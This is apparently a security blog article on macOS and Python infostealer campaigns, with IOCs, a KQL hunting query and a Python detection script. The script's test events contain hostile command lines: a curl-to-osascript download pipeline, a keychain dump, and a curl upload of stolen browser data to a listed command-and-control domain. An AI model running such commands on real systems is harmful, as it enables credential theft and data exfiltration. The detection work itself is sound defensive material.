Infostealer malware is rapidly expanding beyond Windows and is now hitting macOS hard. This article summarizes Microsoft's reporting on recent macOS and Python-based stealer campaigns, including Eternidade Stealer. To steal credentials covertly, attackers abuse trusted applications, native macOS tooling, and Python code.

Since late 2025, Microsoft Defender Experts have been tracking macOS campaigns that use fraudulent websites, ClickFix lures, and malicious DMG files to deliver stealers including Atomic macOS Stealer (AMOS), DigitStealer, and MacSync. The malware uses AppleScript (osascript) and other built-in macOS tools to harvest browser data, keychains, and developer secrets, largely without writing its own binaries to disk. Python-based stealers add to the problem because the same code can be adapted quickly to any operating system.

Other campaigns spread stealers such as Eternidade Stealer through fake PDF editors and WhatsApp, targeting cryptocurrency wallets and banking logins. The stolen data feeds business breaches, account takeover, and financial loss.

Python Phishing, App Abuse, and macOS Tricks

Mac users encounter fake Google Ads and websites that push malicious downloads or Terminal commands. ClickFix lures have victims paste a command that installs AMOS (posing as an AI tool), MacSync (a fake Terminal paste), or DigitStealer (through a counterfeit DynamicLake app). All three harvest browser passwords, cryptocurrency wallets, cloud keys, and development tokens, then clean up after themselves.

The stolen data is zipped and sent to attacker-controlled servers. Python-based stealers such as PXA Stealer also grew in 2025, with Vietnamese actors using phishing to target government entities. These campaigns rely on obfuscated scripts, DLL sideloading, and fake svchost.exe processes, and use Telegram for command and control. Campaigns observed in October and December establish persistence with scheduled tasks or Run keys and exfiltrate data over Telegram.

Another campaign abuses WhatsApp to spread worm-like from victim to victim.

A November 2025 campaign starts with PowerShell and VBS scripts that drop batch files. An MSI then installs Eternidade Stealer, which harvests the victim's contacts and sends them malicious messages. This Delphi-based stealer watches for banking and cryptocurrency sites such as Bradesco, Binance, and MetaMask.

A September campaign used malvertising to push a fake Crystal PDF editor. Beyond creating scheduled tasks, the bogus editor steals sessions and cookies from the Chrome and Firefox profiles under AppData.

IOCs, Detections, and Mitigations

Educating users about fraudulent installers and the risk of pasting commands into Terminal heads off most of these infections. Watch for curl, base64, gunzip, and osascript chained together in Terminal sessions.

Flag ZIP archives created in /tmp, unusual POSTs to newly seen domains, and keychain access. Use Microsoft Defender XDR with cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated remediation, and tamper protection. Attack surface reduction rules block untrusted executables, JS/VBS downloads, and obfuscated scripts.

Defender detects the chain end to end: defense evasion (DLL side-loading, certutil), execution (PowerShell downloads via curl, osascript), persistence (Run keys, LaunchAgents), credential access, discovery (WMI, Python), command and control, collection (ZIP archives), and exfiltration (curl). To hunt for DigitStealer, start with the following query:

```kusto
// Suspicious DMG mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'
```

Similar KQL covers the Crystal PDF scheduled tasks, AMOS DMG mounts, PXA's fake svchost.exe, the WhatsApp campaign's VBS drops, and MacSync's curl downloads.

Important IOCs (samples):

Indicator                                                         Type     Description
3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a  SHA-256  DigitStealer payload
42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417  SHA-256  AMOS payload
2c885d1709e2ebfcaa81e998d199b29e982a7559b9d72e5db0e70bf31b183a5f  SHA-256  WhatsApp campaign
598da788600747cf3fa1f25cb4fa1e029eca1442316709c137690e645a0872bb  SHA-256  Crystal PDF payload
dynamiclake[.]org                                                 Domain   DigitStealer delivery
barbermoo[.]coupons                                               Domain   MacSync C2
alli-ai[.]pro                                                     Domain   AMOS redirect
bagumedios[.]cloud                                                Domain   PXA C2

Check Threat Analytics for the MacSync and Crystal PDF intelligence reports.
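As an added example (not code from the article or from Microsoft), the following Python applies the same heuristics to constructed process-event records: it ports the DMG-mount query above, flags curl chained with base64, gunzip or osascript, ZIP staging in /tmp, keychain access via the security CLI and curl uploads, and matches the defanged IOC domains after refanging them. The field names FileName and ProcessCommandLine mirror DeviceProcessEvents and are an assumption about the export format; the sample events are constructed, not real telemetry.

```python
import re

# Defanged indicators from the IOC table above; refanged at match time.
IOC_DOMAINS = {
    "dynamiclake[.]org": "DigitStealer delivery",
    "barbermoo[.]coupons": "MacSync C2",
    "alli-ai[.]pro": "AMOS redirect",
    "bagumedios[.]cloud": "PXA C2",
}

# Built-in tools the article says to watch for in Terminal sessions.
LOLBINS = ("curl", "base64", "gunzip", "osascript")


def refang(indicator: str) -> str:
    """Turn a defanged IOC such as example[.]com back into example.com."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def analyze_event(ev: dict) -> list:
    """Return the names of the rules that fire for one process event.

    The event is a dict keyed like DeviceProcessEvents (FileName,
    ProcessCommandLine); those field names are an assumption.
    """
    name = ev.get("FileName", "")
    cmd = ev.get("ProcessCommandLine", "")
    hits = []

    # Rule 1: Python port of the DigitStealer DMG-mount KQL query above.
    if (name in ("mount_hfs", "mount")
            and "-o nodev" in cmd and "-o quarantine" in cmd
            and "/Volumes/Install DynamicLake" in cmd):
        hits.append("suspicious_dmg_mount")

    # Rule 2: ClickFix-style one-liner: curl chained with decode/unpack/AppleScript.
    tools = {t for t in LOLBINS if re.search(rf"\b{t}\b", cmd)}
    if "curl" in tools and tools & {"base64", "gunzip", "osascript"}:
        hits.append("clickfix_pipeline")

    # Rule 3: staging a ZIP archive under /tmp ahead of exfiltration.
    if name in ("zip", "ditto") and re.search(r"/tmp/\S+\.zip\b", cmd):
        hits.append("tmp_zip_staging")

    # Rule 4: keychain access through the security CLI.
    if name == "security" and re.search(
            r"\b(dump-keychain|find-generic-password|find-internet-password)\b", cmd):
        hits.append("keychain_access")

    # Rule 5: curl uploading data. Judging whether the destination domain is
    # "new" needs a baseline of known domains, which this example does not have.
    if name == "curl" and re.search(
            r"(-X\s*POST|--data-binary|--upload-file|\s-T\s|\s-F\s)", cmd):
        hits.append("curl_upload")

    # Rule 6: any reference to a known IOC domain.
    for ioc, desc in IOC_DOMAINS.items():
        if refang(ioc) in cmd:
            hits.append(f"ioc_domain:{desc}")
    return hits


def triage(events: list) -> list:
    """Indexes of the events that trigger at least one rule."""
    return [i for i, ev in enumerate(events) if analyze_event(ev)]


# Constructed sample events (not real telemetry) modelled on the article's descriptions.
SAMPLE_EVENTS = [
    {"FileName": "mount_hfs",
     "ProcessCommandLine": "mount_hfs -o nodev -o quarantine /dev/disk4s1 '/Volumes/Install DynamicLake'"},
    {"FileName": "bash",
     "ProcessCommandLine": "bash -c \"curl -fsSL https://alli-ai.pro/i | base64 -d | osascript\""},
    {"FileName": "zip",
     "ProcessCommandLine": "zip -r /tmp/out.zip '/Users/jane/Library/Application Support/Google/Chrome/Default'"},
    {"FileName": "security",
     "ProcessCommandLine": "security dump-keychain -d /Users/jane/Library/Keychains/login.keychain-db"},
    {"FileName": "curl",
     "ProcessCommandLine": "curl -X POST --data-binary @/tmp/out.zip http://barbermoo.coupons/upload"},
    {"FileName": "hdiutil",  # benign developer activity; should not fire
     "ProcessCommandLine": "hdiutil attach /Users/jane/Downloads/vendor-tool.dmg"},
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["FileName"], analyze_event(SAMPLE_EVENTS[i]))
```

The rules are deliberately narrow: a single hit such as curl_upload is common in developer environments, so in practice you would correlate two or more hits on the same host within a short window (archive in /tmp followed by an upload, or keychain access followed by an IOC domain) before raising an alert.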

These cross-platform stealers blend in with normal tooling and slip past outdated defenses, so organizations should hunt for them now.